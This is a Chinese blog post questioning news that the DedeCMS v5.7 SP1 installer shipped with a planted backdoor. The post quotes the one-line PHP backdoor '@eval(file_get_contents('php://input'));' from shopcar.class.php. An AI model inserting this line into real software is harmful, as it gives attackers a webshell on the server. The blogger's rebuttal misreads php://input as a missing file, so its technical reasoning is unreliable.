杀毒软件大佬们背后的织梦CMS系统隐患
织梦CMS(DEDECMS)的强大是所有站长人都知道的,也正是TA是国内第一个效仿国外的开源CMS,所以在国内的开源程序变得越来越多,程序的BUG变得越来越少,安全性变得越来越强大,功能性越来越强大。当然更多的效仿程序也越来越多,通过攻击的也变得越来越多。织梦CMS有后门已经不是一件稀奇的事,用的人多了,安全性也就差了,就如WINDOWS一样,补丁不断,有补丁说明性能在不断提升。
最近网易科技有这样一份新闻:
“瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)
织梦CMS中被植入的后门代码”
不排除此新闻的真实性,但是不是安全软件方的又一份炒作或者想在媒体露下脸,代表他们在安全软件行业他们是存在的,代表他们的技术还是”权威”的,代表他们检测机构的效率呢。在此并不是去评论啥,但总想说两点。
其一,织梦CMS,版本信息:V5.7正式版( 2011-12-27),从发布到现在已经三个多月过去了,难道是最近DEDECMS加进去的后门代码?!
其二,别说“@eval(file_get_contents(‘php://input’));”这样一条语句啦,连input这文件里都没有,不知道他们是怎么检测出来的
发表评论
Comment List(1)
锁匠工具
2012.3.27 04:03
这个问题貌似很严重!